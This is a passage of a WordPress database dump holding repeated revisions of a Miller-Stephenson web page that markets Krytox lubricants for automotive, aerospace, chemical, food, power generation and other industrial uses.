Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 16:58:04', '2016-09-28 16:58:04', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2082, 2, '2016-09-28 16:58:37', '2016-09-28 16:58:37', '&nbsp;\r\n\r\n[ux_product_categories_grid number="22" parent="0"]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 16:58:37', '2016-09-28 16:58:37', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2083, 2, '2016-09-28 16:58:58', '2016-09-28 16:58:58', '&nbsp;\r\n\r\n[ux_product_categories_grid number="5" parent="0"]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 